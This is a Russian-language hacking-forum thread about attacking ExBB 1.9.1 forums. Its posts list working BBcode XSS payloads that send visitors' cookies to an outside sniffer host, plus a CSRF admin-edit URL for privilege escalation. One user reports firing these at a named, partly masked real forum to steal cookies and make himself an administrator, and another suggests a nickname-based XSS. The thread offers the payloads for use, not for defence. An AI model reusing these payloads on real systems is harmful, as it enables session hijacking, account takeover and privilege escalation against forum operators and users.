ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу Xss в exbb 1.9.1
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.10.2004, 00:53
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

XSS в каждом теге
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javasc ript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
[size='z="]"style='background:url(javascript:docum ent.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
[url]'z="style='background:url(javascript:document .images[0].src=/http:@@localhost@1.php?/.source.replace(/@/g,String.fromCharCode(47))+document.cookie)'[/url]
[url="]"style='background:url(javascript:document. images[0].src="http://localhost/1.php?"+document.cookie)'[/url]
[img]http://"z='[/img]'style='background:url(javascript:document.ima ges[0].src="http://localhost/1.php?"+document.cookie)'
[img]"onerror="document.images[0].src='http://localhost/1.php'+String.fromCharCode(63)+document.cookie[/img][/QUOTE]<span id='postcolor'>

кроме xss есть еще одна бага
форма редактирования пользователей из админки передается методом GET
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">http://localhost/exbb/setmembers.php?action=edit_user&amp;checkaction=ye s&amp;userid=3&amp;membertitle=&amp;emailaddress=l ol@lol.ru&amp;newname=lol&amp;password=&amp;homepa ge=&amp;aolname=&amp;icqnumber=&amp;location=&amp; interests=&amp;signature=&amp;numberofposts=0&amp; avatar=noavatar.gif&amp;membercode=ad&amp;submit=% CE%F2%EF%F0%E0%E2%E8%F2%FC[/QUOTE]<span id='postcolor'>
userid=3 - id пользователя для поднятия прав
newname=ваше имя

http://video.antichat.ru/videos/zfailure/exbb_191.rar
 
Ответить с цитированием

  #2  
Старый 19.10.2004, 18:48
Аватар для OwrLam
OwrLam
Познающий
Регистрация: 14.05.2004
Сообщений: 49
Провел на форуме:
26695

Репутация: 4
Отправить сообщение для OwrLam с помощью ICQ
По умолчанию
Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - &quot;&gt;
 
Ответить с цитированием

  #3  
Старый 19.10.2004, 21:03
Аватар для zFailure
zFailure
Участник форума
Регистрация: 06.06.2004
Сообщений: 169
Провел на форуме:
0

Репутация: 82
Отправить сообщение для zFailure с помощью ICQ
По умолчанию
ну извени!
там на столько бедная админка, что хрен там было! &nbsp;
 
Ответить с цитированием

  #4  
Старый 06.01.2005, 19:18
Аватар для ViPN
ViPN
Новичок
Регистрация: 06.01.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
Отправить сообщение для ViPN с помощью ICQ
По умолчанию
zFailure
Не мог бы сказать этот баг уже прикрыли?
а то отсылаю вот этот код
Код:
[size='z="]"style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'[/size]
[size='z="]"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&emailaddress=666z@list.ru&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/size]
а там тишина и пустота
Последний раз редактировалось Егорыч+++; 06.01.2005 в 19:33..
 
Ответить с цитированием

  #5  
Старый 31.01.2005, 16:28
Аватар для ViPN
ViPN
Новичок
Регистрация: 06.01.2005
Сообщений: 2
Провел на форуме:
0

Репутация: 0
Отправить сообщение для ViPN с помощью ICQ
По умолчанию
кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!
 
Ответить с цитированием

  #6  
Старый 31.01.2005, 17:03
Аватар для Егорыч+++
Егорыч+++
Administrator
Регистрация: 27.05.2002
Сообщений: 1,241
Провел на форуме:
20377164

Репутация: 0


По умолчанию
У нас видео есть про этот форум
Последний раз редактировалось Егорыч+++; 03.02.2005 в 19:12..
 
Ответить с цитированием

  #7  
Старый 06.02.2005, 20:14
Аватар для Menvix
Menvix
Познающий
Регистрация: 03.02.2005
Сообщений: 41
Провел на форуме:
508187

Репутация: 16
По умолчанию
Кликнул по ссылке
 
Ответить с цитированием

  #8  
Старый 19.02.2005, 22:11
Аватар для Kihamo
Kihamo
Новичок
Регистрация: 14.01.2005
Сообщений: 4
Провел на форуме:
5921

Репутация: 0
По умолчанию
Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку
Код:
<a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a>
, мона зарегистрировать например такой ник
Код:
');alert(document.cookie+'
и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как
Последний раз редактировалось Kihamo; 19.02.2005 в 22:14..
 
Ответить с цитированием

  #9  
Старый 25.03.2005, 12:03
Аватар для smag
smag
Познающий
Регистрация: 24.03.2005
Сообщений: 34
Провел на форуме:
234471

Репутация: 4
По умолчанию
Цитата:
Сообщение от Егорыч+++  
У нас видео есть про этот форум
дайте пожайлуста видео!!!! чем больше тем лутше!!!
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ